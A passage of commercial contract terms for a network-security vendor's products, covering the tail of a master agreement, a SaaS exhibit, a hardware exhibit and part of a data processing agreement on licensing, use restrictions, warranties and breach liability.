and Centripetal expressly reserves all other remedies available in law or equity.7.2 Confidential Information. The confidentiality terms and conditions any previously executed, valid non-disclosure agreement between the Parties (the “NDA”) are incorporated by reference into this Agreement and shall remain in full force and effect for the term of this Agreement. Without limiting the foregoing, the parties agree that the existence of the terms of this Agreement, the Feedback and any other results related to Client’s use of the Product shall constitute confidential information of Centripetal.7.3 Entire Agreement. This Agreement sets forth the entire agreement and understanding between the Parties with respect to the subject matter hereof and supersedes and merges all prior oral and written agreements and understandings between the Parties with respect to such subject matter. Neither Party shall be bound other than as expressly provided for herein.7.4 Independent Contractors. In making and performing this Agreement, the Parties act and shall act at all times as independent contractors, and nothing contained in this Agreement shall be construed or implied to create an agency, partnership, or employer-and-employee relationship between them. At no time shall either Party make commitments, or in the name of, the other Party.7.5 All notices required by or relating to this Agreement shall be in writing and shall be sent by means of certified mail, postage prepaid, to the Parties at such addresses as are set forth below, or to such other address as either Party may have given by written notice in accordance with this provision. All notices required by or relating to this Agreement may also be communicated by facsimile, provided that the sender receives and retains confirmation of successful transmittal to the recipient. Such notices shall be effective on the date indicated in such confirmation. In the event that either Party delivers any notice hereunder by means of facsimile transmission in accordance with the preceding sentence, such Party will promptly thereafter send a duplicate of such notice in writing by means of certified mail, postage prepaid, to the receiving Party, addressed as set forth above or to such other address as the receiving Party may have previously substituted by written notice to the sender.7.6 Amendments; Modifications. This Agreement may not be amended or modified except in a writing duly executed by the Party against whom enforcement of such amendment or modification is sought.7.7 Successors and Assigns. The terms and conditions of this Agreement shall inure to the benefit of and be binding upon the respective successors and assigns of the Parties, provided that Client may not assign any of its rights hereunder, nor delegate any of its duties hereunder, without the prior written consent of Centripetal, and further provided that, absent such prior written consent, any attempted assignment or delegation by Client hereunder shall be null, void and of no effect. Centripetal may freely assign this Agreement. Nothing in this Agreement, express or implied, is intended to confer upon any party other than the Parties or their respective successors and assigns any rights, remedies, obligations, or liabilities under or by reason of this Agreement, except as expressly provided in this Agreement. The parties acknowledge and agree that Centripetal may assign its right to collect any fees under this Agreement to any third party.7.8 If any provision of this Agreement is invalid or unenforceable for any reason in any jurisdiction, such provision shall be construed to have been adjusted to the minimum extent necessary to cure such invalidity or unenforceability. The invalidity or unenforceability of one or more of the provisions contained in this Agreement shall not have the effect of rendering any such provision invalid or unenforceable in any other case, circumstance, or jurisdiction, or of rendering any other provisions of this Agreement invalid or unenforceable whatsoever.7.9 No waiver under this Agreement shall be valid or binding unless set forth in writing and duly executed by the Party against whom enforcement is sought. Any such waiver shall constitute a waiver only with respect to the specific matter described therein and shall in no way impair the rights of the Party granting such waiver in any other respect or at any other time. Any delay or forbearance by either Party in exercising any right hereunder shall not be deemed a waiver of that right.7.10 Governing Law. THIS AGREEMENT SHALL BE GOVERNED BY AND INTERPRETED IN ACCORDANCE WITH THE LAWS OF THE COMMONWEALTH OF VIRGINIA, WITHOUT REGARD TO CONFLICTS OF LAW PRINCIPLES THEREOF OR TO THE UNITED NATIONS CONVENTION ON THE INTERNATIONAL SALE OF GOODS. FOR PURPOSES OF ALL CLAIMS BROUGHT UNDER THIS AGREEMENT, EACH OF THE PARTIES HEREBY IRREVOCABLY SUBMITS TO THE EXCLUSIVE JURISDICTION OF THE STATE AND FEDERAL COURTS LOCATED IN FAIRFAX COUNTY, VIRGINIA.7.11 S. Government End-Users. Each of the components that constitute the Product is a “commercial item” as that term is defined at 48 C.F.R. 2.101, consisting of “commercial computer software” and/or “commercial computer software documentation” as such terms are used in 48 C.F.R. 12.212. Consistent with 48 C.F.R. 12.212 and 48 C.F.R. 227.7202-1 through 227.7202-4, all U.S. Government end users acquire the Product with only those rights set forth herein.7.12 Export Controls. Client will comply with all applicable export and import control laws and regulations in its use of the Product including regulations of the United States Bureau of Industry and Security and other applicable agencies. Client will not, directly or indirectly, export or re-export, or knowingly permit the export or re- export of any Product to any country for which approval is required under the laws of the United States or any other country unless the appropriate export license or approval has first been obtained. Without limiting the generality of the foregoing, each Party agrees that it does not intend to nor will it, directly or indirectly, engage in any export or re-export (a) to any prohibited destination under U.S. export restrictions, or to any national of any such country, wherever located, (b) to any entity or individual who such Party knows or has reason to know is engaging in the design, development or production of nuclear, chemical or biological weapons, or missile technology, or (c) to any entity or individual who has been prohibited from participating in U.S. export transactions by any federal agency of the U.S. Government, including the U.S. Department of Treasury’s Office of Foreign Assets Control and the U.S. Bureau of Industry and Security. Client will provide Centripetal with copies of all export registrations and filings with the United States government.7.13 This Agreement may be executed in two or more counterparts, each of which shall be deemed an original and all of which together shall constitute one instrument. --- ### [Software as a Service Exhibit](https://www.centripetal.ai/saas-exhibit) Published: 2025-08-12 Software as a Service (SaaS) ExhibitLast Updated: August 24th 2026This SaaS Exhibit (“SaaS Exhibit”) forms part of the Master Service Agreement (“MSA”) between Centripetal Networks, LLC and Customer identified in the applicable Order Form. This SaaS Exhibit governs Customer’s access to and use of the SaaS Products (as defined in the MSA), which are identified in the applicable Order Form. Capitalized terms used but not defined in this SaaS Exhibit have the meanings set forth in the MSA. 1. ACCESS AND USE Subject to Customer&rsquo;s timely payment of all undisputed Fees and its continued compliance with the applicable Agreements, Centripetal grants Customer a limited, non-exclusive, non-transferable, non-assignable, and non-sublicensable (except as expressly permitted herein) right, during the applicable Term, to access and use, and where applicable to install and operate the client or endpoint software components of, the SaaS Products specified in the applicable Order Form solely for Customer&rsquo;s internal lawful business purposes. Customer shall use and access the SaaS Products in accordance with the Agreements and the Documentation. Customer acknowledges that the SaaS Products (including any associated software components) are licensed, not sold. As between the Parties, Centripetal and its licensors own all right, title, and interest in and to the intellectual property rights in the SaaS Products and any associated software components, including any improvements, modifications, or enhancements thereto, as further set forth in Section 5 (Centripetal Ownership) of the MSA. All rights not expressly granted to Customer are reserved by Centripetal and its licensors. Centripetal will provide Customer with the necessary credentials, passwords, and connectivity details to enable access to the SaaS Products. 2. USE RESTRICTIONS Customer shall not use the SaaS Products in any manner not expressly permitted by the applicable Agreements or the Documentation. Without limiting the foregoing, Customer shall not, and shall not permit any third party to, directly or indirectly: (i) use the SaaS Products in any manner that violates Data Protection Laws or any other applicable law; (ii) use the SaaS Products in any manner that violates the applicable Agreements; (iii) use the SaaS Products in any manner that infringes, misappropriates, or otherwise violates any third-party&rsquo;s rights; (iv) copy, modify, or create derivative works of the SaaS Products or create models that may compete with the SaaS Products, in whole or part; (v) rent, lease, lend, sell, sublicense, assign, transfer, or make available the SaaS Products to any third-party; (vi) reverse engineer, disassemble, decompile, decode, adapt, or attempt to derive or gain access to any software code or component of the SaaS Products; (vii) use the SaaS Products or any related outputs, including Threat Intelligence Data or Deliverables, to provide services to third parties (for example, as part of a managed service, outsourcing arrangement, or redistribution of threat intelligence feeds), except as expressly permitted in writing by Centripetal; (viii) use the SaaS Products for purposes of benchmarking, competitive analysis, or publication of performance tests without Centripetal&rsquo;s prior written consent; (ix) interfere with or disrupt the integrity, performance, or security of the SaaS Products, including attempting to bypass or disable any security or access controls; (x) input, store, or transmit malicious code, unlawful content, or any material that violates third-party privacy or IP rights through the SaaS Products; (xi) remove any proprietary notices from the SaaS Products; or (xii) use, export, re-export, or provide access to the SaaS Products in violation of applicable export control or economic sanctions laws. 3. SUSPENSION OR TERMINATION OF SAAS PRODUCTS Centripetal may suspend, temporarily or permanently terminate, deny, discontinue, or restrict Customer&rsquo;s and any Authorized User&rsquo;s access to and use of all or any of the SaaS Products, without any Liability to Customer, if: (i) Centripetal determines that Customer&rsquo;s or any Authorized User&rsquo;s use of the SaaS Products (1) violates Section 2 (Use Restrictions) of the SaaS Exhibit, Data Protection Laws, other applicable law, or the applicable Agreements, (2) creates or causes any security or privacy threat or risk, or disrupts any other person&rsquo;s use of the SaaS Products, or (3) is illegal, unlawful, fraudulent, deceptive, defamatory, obscene, offensive, abusive, unethical, immoral, or dishonest; (ii) there is a threat or attack to the SaaS Products, Hardware, or Centripetal&rsquo;s systems or infrastructure; (iii) Customer&rsquo;s or Centripetal&rsquo;s connection to computer systems, Internet, or hosting providers is impaired; (iv) Centripetal must do so under any Data Protection Laws or other applicable law, or pursuant to an order or instruction of any law enforcement, governmental, or regulatory authority; (v) Centripetal has ceased to continue its business in the ordinary course, made an assignment for the benefit of creditors or similar disposition, or becomes the subject of any bankruptcy, reorganization, liquidation, dissolution, or similar proceeding; (vi) there is suspension or termination of Centripetal&rsquo;s use of any third-party technology or service required to support the SaaS Products; or (vii) Customer fails to pay undisputed Fees when due. Unless prohibited from doing so or otherwise commercially impracticable, Centripetal shall use commercially reasonable efforts to provide notice of any suspension or termination of the SaaS Products or Services to Customer under this section, and update Customer about the resumption of the SaaS Products following any such suspension or termination. Centripetal has no Liability to Customer arising out of or related to any suspension or termination of the SaaS Product under this section. The foregoing does not affect any refund of prepaid Fees to which Customer is entitled under Section 13 (Termination) of the MSA. Nothing in this section limits Centripetal&rsquo;s obligations under the DPA. The rights in this Section are in addition to, and do not limit, Centripetal&rsquo;s suspension and termination rights under Section 15 (Fees) of the MSA or any other right or remedy. 4. CUSTOMER RESPONSIBILITIES Customer is liable to Centripetal for all Liability arising out of or related to Customer&rsquo;s and Authorized Users&rsquo; access to and use of the SaaS Products. Without limiting the foregoing, Customer shall (i) ensure that it has all rights and authorizations necessary to provide Customer Data to Centripetal, including logs and telemetry from Customer&rsquo;s third-party systems, for the purposes described in the MSA and this SaaS Exhibit; (ii) ensure that Customer&rsquo;s systems, networks, and devices meet the minimum technical requirements specified by Centripetal for the SaaS Products and are properly configured and maintained; (iii) implement and maintain commercially reasonable measures designed to ensure the confidentiality and security of all passwords, biometrics, tokens, or other credentials used by Customer and Authorized Users to access the SaaS Products, and ensure that access credentials are not shared with or disclosed to any third-party; (iv) be responsible for the acts and omissions of its Authorized Users, including ensuring that Authorized Users comply with this SaaS Exhibit; (v) provide all notices and obtain all consents from individuals whose Personal Information may be processed in connection with Customer&rsquo;s use of the SaaS Products, if such notice and consent is required by applicable Data Protection Laws; (vi) promptly notify Centripetal of any unauthorized access to, or use of, the SaaS Products of which Customer becomes aware; and (vii) for any SaaS Product that includes one or more installed or mobile client application(s), including CleanINTERNET-Remote, deployed on Authorized Users&rsquo; or other individuals&rsquo; devices (including personally owned devices), obtain and maintain all rights, authorizations, and consents necessary for the installation and operation of the client and for Centripetal&rsquo;s access to, monitoring of, and processing of DNS queries, web communications, other traffic, and related data from those devices, including when the devices are used outside Customer&rsquo;s network. 5. USAGE AND THREAT INTELLIGENCE DATA Customer understands that in order for Centripetal to provide the SaaS Products, Centripetal needs to monitor, access, and process network traffic, queries, logs, and other data transmitted through or generated by the SaaS Products. Such monitoring and processing may include analyzing and correlating that data to detect threats, enhance performance, and improve the SaaS Products. Rights, ownership, and permitted uses of any resulting Usage Data and Threat Intelligence Data are governed by Section 5 (Centripetal Ownership) and Section 6 (Customer Ownership) of the MSA. Customer is responsible for providing all notices and obtaining all consents required under applicable law to enable such monitoring, access, and processing. 6. THIRD-PARTY PRODUCTS Certain Products may include embedded software or software components delivered with SaaS Products, and may incorporate or be delivered through Third-Party Technology. Customer acknowledges and agrees that (i) Centripetal does not control and is not responsible for the operation, features, accuracy, or reliability of any Third-Party Technology; (ii) to the extent Centripetal makes any third-party license terms available to Customer, Customer&rsquo;s use of the applicable Third-Party Technology is subject to those terms; and (iii) Centripetal provides Third-Party Technology &ldquo;as is&rdquo; without warranties of any kind and expressly disclaims all Liability with respect to such Third-Party Technology, except to the extent otherwise expressly set forth in the MSA. For clarity, certain SaaS Products may incorporate identified Third-Party Technology as specified in the applicable Order Form or related schedule. 7. LIABILITY The Liability obligations of the Parties are set forth in Section 19 (Limitation of Liability) of the MSA, which apply in full to the SaaS Products. For clarity, Centripetal has no indemnification obligation with respect to any Third-Party Technology incorporated in or used with the SaaS Products. 8. RETURN OF INFORMATION On the expiration or termination of the MSA, Centripetal shall return to Customer or destroy all Customer Data within ninety 90 days after the expiration or termination of the MSA; provided that Centripetal may retain such Customer Data on backup media as long as such media is periodically erased or overwritten, and such retained Customer Data shall remain subject to the Agreements for as long as Centripetal retains it. 9. MANAGED DETECTION AND RESPONSE (CI-MDR) CI-MDR may be provided using Third-Party Technology, comprising endpoint security software and a managed detection and response service supplied by Centripetal&rsquo;s third-party provider. Although CI-MDR is offered as a SaaS Product, Section 2 (Use Restrictions), Section 6 (Third-Party Products), and Section 7 (Liability) apply to it in full. In particular: (a) CI-MDR, including the endpoint agent and any service outputs, is provided &ldquo;as is,&rdquo; and Centripetal makes no warranty, representation, or guarantee regarding CI-MDR beyond any expressly stated in the MSA; (b) Centripetal has no indemnification obligation to Customer with respect to CI-MDR or the underlying Third-Party Technology; (c) detection, isolation, containment, and other response actions affecting an endpoint form part of the managed CI-MDR service and are undertaken at Customer&rsquo;s risk, and Centripetal does not guarantee that any threat will be detected, prevented, or remediated; and (d) Customer&rsquo;s access to CI-MDR depends on Centripetal&rsquo;s continued access to that Third-Party Technology, and Centripetal may suspend or discontinue CI-MDR under Section 3 (Suspension or Termination of SaaS Products) if that access ends. --- ### [Hardware Exhibit](https://www.centripetal.ai/hardware-exhibit) Published: 2025-08-12 Hardware ExhibitLast Updated: August 24th 2026These Hardware Terms (“Hardware Terms”) form part of the Master Service Agreement (“MSA”) between Centripetal Networks, LLC and Customer identified in the applicable Order Form. Capitalized terms used but not defined in these Hardware Terms have the meanings set forth in the MSA.These Hardware Terms govern Customer’s access and use of the Centripetal hardware device (e.g., RuleGATE) provided to Customer for use under an applicable Order Form (“Hardware”), and any software programs, firmware, or code pre-installed or otherwise embedded in such hardware that are necessary for its operation (“Embedded Software”). 1. PROVISION OF HARDWARECentripetal agrees to provide Customer with the Hardware identified in the applicable Order Form during the Term specified therein. Customer shall use the Hardware solely in accordance with (i) the MSA, (ii) these Hardware Terms, and (iii) the applicable Order Form, and exclusively for Customer’s internal business purposes. Customer shall not resell, lease, sublicense, or otherwise make the Hardware available to any third party. Except as expressly set forth in these Hardware Terms, Customer obtains no rights in or to the Hardware, and as between the Parties, Centripetal and its licensors retain all right, title, and interest (including all intellectual property rights) in and to the Hardware, including any improvements, modifications, or enhancements thereto, consistent with Section 5 (Centripetal Ownership) of the MSA. Title to and ownership of the Hardware remain with Centripetal at all times. The Hardware is provided to Customer on a bailment basis for use during the Term, and no sale of the Hardware is intended.2. EMBEDDED SOFTWAREThe Hardware may contain certain Embedded Software. Such Embedded Software is licensed, not sold, to Customer. Subject to Customer’s continued compliance with the MSA, these Hardware Terms, and the applicable Order Form, Centripetal grants Customer a limited, nonexclusive, nontransferable, non-sublicensable, paid-up license to use the Embedded Software solely (i) in executable object code form, (ii) as embedded in and delivered with the Hardware, and (iii) in connection with Customer’s authorized use of the Hardware during the Term. As between the Parties, Centripetal and its licensors retain all right, title, and interest (including all intellectual property rights) in and to the Embedded Software, including any improvements, modifications, or enhancements thereto, consistent with Section 5 (Centripetal Ownership) of the MSA.3. OPEN-SOURCE SOFTWARECertain components of the Embedded Software may be subject to “open source” or “free software” licenses (collectively, “Open Source Software”). Some of the Open Source Software is owned by third parties. To the extent required by the applicable open source license, Customer’s use of the Open Source Software will be governed by the terms of the applicable open source license, and such terms shall control to the extent they expressly grant Customer rights that differ from or conflict with the restrictions set forth in these Hardware Terms. Nothing in these Hardware Terms limits Customer’s rights under, or grants Customer rights that supersede, the terms of any such open source license. Customer acknowledges that (i) Centripetal makes no representations or warranties regarding Open Source Software; (ii) Centripetal shall have no indemnification obligations with respect to Open Source Software; and (iii) Customer is solely responsible for its compliance with the applicable open source license terms.4. USE RESTRICTIONSCustomer shall not use the Hardware or Embedded Software in any manner not expressly permitted by the Hardware Terms, the applicable Order Form, or any Documentation provided by Centripetal. Without limiting the foregoing, Customer shall not, and shall not permit any third party to, directly or indirectly: (i) adapt, alter, modify, translate, decompile, disassemble, reverse engineer, or create derivative works of the Hardware or Embedded Software; (ii) circumvent, disable, or interfere with any security, access, monitoring, or usage control associated with the Hardware or Embedded Software; (iii) separate, unbundle, or use the Embedded Software independently of the Hardware with which it is provided; (iv) rent, lease, lend, sell, sublicense, assign, transfer, or otherwise make available the Hardware or Embedded Software to any third party, except as expressly permitted in writing by Centripetal; (v) use the Hardware or Embedded Software to provide services to third parties (for example, as part of a managed service, outsourcing arrangement, or redistribution of threat intelligence feeds), except as expressly permitted in writing by Centripetal; (vi) use the Hardware or Embedded Software for purposes of benchmarking, competitive analysis, or publication of performance tests without Centripetal’s prior written consent; (vii) remove, obscure, or alter any proprietary notices on the Hardware or Embedded Software; or (viii) use the Hardware or Embedded Software in violation of applicable law, or in a manner that infringes, misappropriates, or otherwise violates any third party’s rights.5. PRODUCT CARE; LIENSCustomer shall handle the Hardware with reasonable care and shall use reasonable efforts to prevent damage, loss, or unauthorized access. Customer shall remain responsible for any damage to, or loss of, the Hardware from the time of delivery until it is returned to Centripetal in accordance with these Hardware Terms, but excluding reasonable wear resulting from proper use. Customer shall not tamper with the Hardware. Customer shall not, directly or indirectly, create, incur, assume, or permit to exist any mortgage, pledge, lien, charge, security interest, encumbrance, or claim on or with respect to the Hardware or any interest therein, except for the lien and security interest of Centripetal created under the Hardware Terms. Customer shall promptly, at its own expense, take all actions necessary to discharge any such prohibited mortgage, pledge, lien, security interest, charge, encumbrance, or claim if the same arises at any time. To the extent the arrangement is deemed to create a security interest in, or the Hardware is deemed subject to a security interest of, Customer, Customer grants Centripetal a security interest in the Hardware and its proceeds to secure Customer’s obligations under these Hardware Terms. Customer authorizes Centripetal to file one or more financing statements describing the Hardware, including precautionary filings under Section 9-505 of the Uniform Commercial Code (the “UCC”) identifying Centripetal as bailor and Customer as bailee. Consistent with Section 9-505(b) of the UCC, any such filing is protective only and is not evidence that the arrangement creates a security interest.6. DELIVERY AND INSTALLATIONCentripetal will deliver the Hardware to the location designated by Customer in the applicable Order Form (or as otherwise agreed in writing). Risk of loss and damage to the Hardware shall pass to Customer upon delivery. If requested by Customer and agreed by Centripetal, Centripetal will perform installation at the designated location at a mutually agreeable time, subject to Customer’s reasonable cooperation in providing appropriate access, infrastructure, and environmental conditions. Customer shall be responsible for any installation costs unless otherwise agreed in the applicable Order Form. Centripetal shall not be liable for any delay in delivery or installation caused by events outside its reasonable control.7. ACCESSThroughout the Term, Customer shall provide Centripetal with reasonable access (including remote access where applicable) to Customer’s facilities, systems, and the Hardware as necessary for Centripetal to inspect, maintain, repair, replace, upgrade, or otherwise support the Hardware. Such access shall be provided during normal business hours and subject to Customer’s reasonable security and safety policies. Centripetal shall use reasonable efforts to provide at least three (3) business days’ prior notice for planned inspections or maintenance; provided, however, that in the event of an urgent issue affecting the performance, security, or integrity of the Hardware or Embedded Software, Centripetal may request access on shorter notice, and Customer shall use commercially reasonable efforts to accommodate such request. Customer shall cooperate in good faith to facilitate Centripetal’s access and shall ensure that such access is not unreasonably withheld, conditioned, or delayed. Centripetal shall not be responsible for any degradation of performance, error, or failure of the Hardware or Embedded Software to the extent resulting from Customer’s denial or delay of Centripetal’s access.8. SUPPORTDuring the Term, Centripetal shall: (i) provide training in connection with the initial implementation of the Hardware; and (ii) make available telephone and email support for the Hardware and Embedded Software during Centripetal’s normal business hours of 8:00 AM to 5:00 PM ET, excluding weekends and U.S. federal holidays. Centripetal shall have no obligation to provide support with respect to any error, defect, or issue resulting from: (a) use of the Hardware or Embedded Software other than in accordance with these Hardware Terms, any Documentation, or Centripetal’s written instructions; (b) modification, alteration, or repair of the Hardware or Embedded Software by Customer or any third party not authorized by Centripetal; (c) accident, negligence, misuse, or abuse of the Hardware by the Customer; or (d) any combination, connection, or use of the Hardware with hardware, software, or technology not provided, approved, or authorized by Centripetal.9. HARDWARE WARRANTYCentripetal warrants to Customer that, for a period of one (1) year from the date of delivery of the Hardware (“Warranty Period”), the Hardware will be free from defects in materials and workmanship under normal use. Centripetal’s sole obligation and Customer’s exclusive remedy for any breach of this warranty shall be, at Centripetal’s option and expense, to repair or replace the defective Hardware or component with new or refurbished parts or units. Any repaired or replaced Hardware or component will be warranted for the remainder of the original Warranty Period or thirty (30) days from the date of repair or replacement, whichever is longer. This warranty does not apply to: (i) consumable parts (e.g., batteries, fans) or cosmetic imperfections that do not materially affect functionality; (ii) damage caused by accident, abuse, misuse, neglect, or improper storage; (iii) modification, alteration, or repair of the Hardware by anyone other than Centripetal or its authorized representatives; (iv) combination, connection, or use of the Hardware with hardware, software, or technology not provided, approved, or authorized by Centripetal; or (v) normal wear consistent with ordinary, intended use.10. DISCLAIMERExcept as expressly provided in these Hardware Terms, the Hardware, Embedded Software, and any other materials or Products provided by Centripetal are provided “as is” and “with all faults.” To the maximum extent permitted by applicable law, Centripetal disclaims all other warranties, representations, and conditions, whether express, implied, statutory, or otherwise, including without limitation any warranties of merchantability, fitness for a particular purpose, accuracy, title, non-infringement, non-interference, and quiet enjoyment. Without limiting the foregoing, Centripetal does not warrant that the Hardware, Embedded Software, or services will meet Customer’s requirements, operate without interruption or error, or that all defects can or will be corrected. Except as otherwise provided in the MSA or the DPA, Centripetal shall not be responsible for any loss of or damage to data processed, transmitted, or stored through the Hardware or Embedded Software. Some jurisdictions do not allow the exclusion of certain warranties, so the above exclusions may not apply to the extent prohibited by applicable law.11. EFFECT OF TERMINATIONUpon expiration or termination of the applicable Order Form for any reason, Customer shall, at its expense, promptly return the Hardware (including all components, accessories, and documentation) to Centripetal in good working order, ordinary wear and tear excepted, in accordance with Centripetal’s return instructions. Customer shall maintain, and shall provide to Centripetal on reasonable notice, all access, rights, and permissions necessary to retrieve the Hardware from any location where it is installed, including third-party premises, and shall reasonably cooperate to facilitate any retrieval Centripetal elects to make. Customer acknowledges that the Hardware depends on Centripetal’s services to operate and that, upon expiration or termination, those services may be suspended and the Hardware may cease to function. If the Hardware is not returned or retrieved within thirty (30) days, Centripetal may invoice Customer for, and Customer shall pay, the then-current replacement value of the Hardware.12. EXPORT CONTROL AND COMPLIANCECustomer shall not export, re-export, transfer, or use the Hardware or Embedded Software except in compliance with all applicable export control and trade laws and regulations of the United States and any other relevant jurisdiction. --- ### [Data Processing Agreement](https://www.centripetal.ai/data-processing-agreement) Published: 2025-08-12 Data Processing AgreementLast Updated: August 24th 2026This Data Processing Agreement (“DPA”) is entered into by Centripetal Networks, LLC (“Centripetal”) and the Customer identified in the Order Form. This DPA governs Centripetal’s Processing of Personal Information. Capitalized terms used but not defined in this DPA have the meanings set forth in the MSA. 1. DEFINITIONSa. “Breach” means the following: (i) any Processing of Personal Information that (a) is not authorized by Customer under the Agreements, (b) is not otherwise authorized by Customer expressly and in writing, (c) exceeds the scope of either such authorization, (d) compromises the confidentiality, integrity or availability of Personal Information, (e) is a breach of the DPA, or (f) violates Data Protection Law; (ii) any access to, use of, or activity on or in any Centripetal network, system, equipment, device, cloud, or online or offline account that is unauthorized or exceeds the scope of authority and involves Personal Information; provided that (iii) this term does not include (a) a Breach of encrypted Personal Information, as long as the decryption key also has not been compromised, or (b) the unintended or good faith Processing of Personal Information by an employee of Centripetal, or the disclosure of Personal Information by an employee of Centripetal to another employee of Centripetal, as long as the Personal Information is not otherwise further Processed without authorization, beyond the scope of authorization, or in a manner or to an extent that compromises the confidentiality, integrity or availability of the Personal Information or violates Data Protection Law.b. “Data Protection Laws” mean all domestic and foreign laws, rules, and regulations that govern (i) a breach or security incident involving Personal Information, (ii) technological, physical, or administrative safeguards for protecting the confidentiality, integrity, or availability of Personal Information, or (iii) Processing of Personal Information; provided that (iv) this term encompasses only laws, rules, and regulations that a Party is subject to such and that govern the Personal Information at issue.c. “Liability” has the same meaning as set forth in the MSA. With respect to a Breach of Personal Information, Liability includes the following: (i) computer, technology, and forensic investigation; (ii) attorney fees; (iii) public relations costs; (iv) notification of affected individuals and regulators; (v) credit and identity monitoring and restoration; (vi) call and email support; and (vii) investigation, inquiry, request, subpoena, other legal process, fine, penalty, settlement, judgment, claim, suit, lawsuit, action, cause of action, or other allegation issued or made by an individual, group or class of individuals, regulator, or any other third-party arising out of or related to the Breach.d. “Process” and any derivation of that term means any operation or set of operations which is performed upon Personal Information, whether or not by automatic means, such as collection, recording, organization, storage, adaptation or alteration, retrieval, consultation, use, disclosure by transmission, dissemination or otherwise making available, alignment or combination, restricting, erasure or destruction.2. ROLESCustomer is the data controller of Personal Information under Data Protection Laws. Centripetal is a data processor of Personal Information under Data Protection Laws.3. TERMIn the event of termination of the MSA, the Parties’ obligations under this DPA will continue until Centripetal has either returned or permanently destroyed all Confidential Information and Personal Information. Once Centripetal has done so, the Parties’ obligations under this DPA terminate.4. DETAILS OF PROCESSINGCentripetal may Process Personal Information for the purpose of performing its obligations under the Agreements, and for the duration of the Agreements. Such Processing shall include collecting, accessing, storing, altering, using, transferring and disclosing to a Sub-Processor, and deletion of Personal Information. The types of Personal Information and the categories of data subjects are those that Customer submits, or that the Products Process in providing the Services.5. CONFIDENTIALITYCentripetal shall maintain Confidential Information and Personal Information as strictly confidential. Centripetal shall not disclose or provide access to any third party to any Confidential Information or Personal Information without Customer authorization, except transfers and disclosures of Personal Information to a Sub-Processor permitted by the MSA. Centripetal shall not Process Confidential Information or Personal Information for any purpose other than to provide Products and Services to Customer, and any Processing shall be limited to Processing of Confidential Information or Personal Information only to the extent doing so is necessary to provide the Products and Services, unless Customer expressly authorizes additional Processing of Confidential Information or Personal Information. Nothing in this Section limits Centripetal’s Processing of Usage Data, Threat Intelligence Data, or Deidentified data as permitted by the MSA.6. SECURITY MEASURESCentripetal shall implement and maintain reasonable physical, technological, and administrative controls designed to safeguard the confidentiality, integrity, and availability of Personal Information.7. OBLIGATIONS PURSUANT TO DATA PROTECTION LAWSa. Customer’s Compliance with Data Protection Laws. Customer shall comply with all Data Protection Laws governing Processing of Personal Information by Centripetal, including, but not limited to: (i) ensuring all instructions given by it to Centripetal in respect of the Processing of Personal Information comply with Data Protection Laws; (ii) providing all notices and obtaining all consents required by Data Protection Laws for Centripetal’s Processing of Personal Information under the MSA; and (iii) addressing all requests made by individuals to assert any right afforded under Data Protection Laws. Customer shall be liable to Centripetal for Liability arising out of or related to any breach of this provision.b. Centripetal’s Compliance with Data Protection Laws. Centripetal shall comply with all Data Protection Laws governing the Processing of Personal Information. Centripetal shall not sell, share, or otherwise disclose Personal Information to any third party (except for transfers or disclosure to a Sub-Processor permitted by the MSA or this DPA), or Process Personal Information by, for, or on behalf of any third party. Centripetal shall Process Personal Information as specified in the MSA, unless additional processing is authorized expressly and in writing by Customer. When Centripetal engages a Sub-processor, Centripetal shall contractually obligate such Sub-Processor to comply with terms that are comparable to the terms in this DPA governing Centripetal’s Processing of Personal Information. Centripetal shall only retain Sub-Processors that are capable of appropriately protecting the privacy, confidentiality and security of Personal Information.c. Centripetal Employees. Centripetal will ensure that employees engaged in the Processing of Confidential Information and Personal Information are informed of the confidential nature of such information, have received appropriate training on their responsibilities concerning such information, and are contractually required to maintain the confidentiality of such information. Centripetal shall ensure that such obligations survive the termination of employment. Centripetal will ensure that Centripetal’s access to Personal Information is limited to those personnel who require such access to perform the Services under the DPA.d. Privacy Rights. Centripetal shall provide reasonable assistance to Customer with respect to Customer’s compliance with Data Protection Laws.e. Data Transfers. To the extent Centripetal transfers Personal Information outside the country from which it was originally delivered or made available to Centripetal, or from which Centripetal otherwise accessed or obtained it, Centripetal shall comply with applicable privacy laws and implement a data transfer mechanism in accordance with Data Protection Laws to the extent required for such cross-border transfer.8. USE OF ARTIFICIAL INTELLIGENCETo the extent any artificial intelligence or algorithmic analysis tools (“AI”), including AI developed, owned, or managed by Centripetal (“Centripetal AI”), or AI developed, owned or managed by third parties but utilized by Centripetal (“Third-Party AI”) are: (i) offered to Customer by Centripetal as part of the Products (“Customer Use”); or (ii) used or relied upon by Centripetal to materially provide or support the provision of Products to Customer (“Centripetal Use”), Centripetal shall comply with the requirements set forth in the AI Addendum attached as Addendum A to this DPA (“AI Addendum”).9. SECURITY OR PRIVACY BREACH NOTIFICATIONCentripetal will notify Customer of a Breach of Personal Information within three business days after Centripetal confirms that such Breach occurred. At the time of such initial notification and continuing thereafter, Centripetal will disclose to Customer non-privileged information that Centripetal has or receives concerning such Breach, including, but not limited to, the following: (i) names and other information available about individuals affected by the breach; (ii) the nature and scope of information compromised or potentially compromised in the breach or as a result of the breach; (iii) timing, manner, and cause of the breach; and (iv) acts taken in response to the breach. Centripetal will provide Customer with assistance and cooperation reasonably requested by Customer related to such Breach, and shall follow and comply with reasonable requests made by Customer related to such breach. Unless otherwise required by applicable law, Centripetal shall not disclose to any person, other than its attorneys and other agents, information related to such Breach without express written authorization from Customer, including by not notifying any individual affected or potentially affected by the breach, any local, state, or federal government authority or agency, any media outlet, or any other person or entity.10. SECURITY OR PRIVACY BREACH LIABILITYCentripetal is liable to Customer for Liability arising out of or related to a Breach of Personal Information within the possession, custody, or control of Centripetal that is not caused by an act or omission of Customer, any sub-processor of Customer, or any of their respective employees, agents, representatives, or sub-processors (“Centripetal Breach”). Customer is liable to Centripetal for Liability arising out of or related to a Breach of Personal Information within the possession, custody, or control of Centripetal that is caused by an act or omission of Customer, any sub-processor of Customer (excluding Centripetal), or any of their respective employees, agents, representatives, or sub-processors (“Customer Breach”). Centripetal’s total Liability to Customer arising out of or related to all Centripetal Breaches shall not exceed $500,000, and Customer’s total Liability to Centripetal arising out of or related to all Customer Breaches shall not exceed $500,000. Each party shall maintain cyber liability insurance sufficient to support its obligations under this Section. Centripetal’s policy shall be primary coverage and Customer’s policy shall be secondary coverage for a Centripetal Breach. Customer’s policy shall be primary coverage and Centripetal’s policy shall be secondary coverage for a Customer Breach.11. AUDITUpon Customer’s reasonable request, and subject to the confidentiality obligations in this DPA and the MSA, Centripetal will provide to Customer non-privileged information evidencing Centripetal’s compliance with its obligations in this DPA.12. RETURN OF INFORMATIONOn the expiration or termination of the MSA, Centripetal shall return to Customer or destroy all Personal Information within sixty (60) days after the expiration or 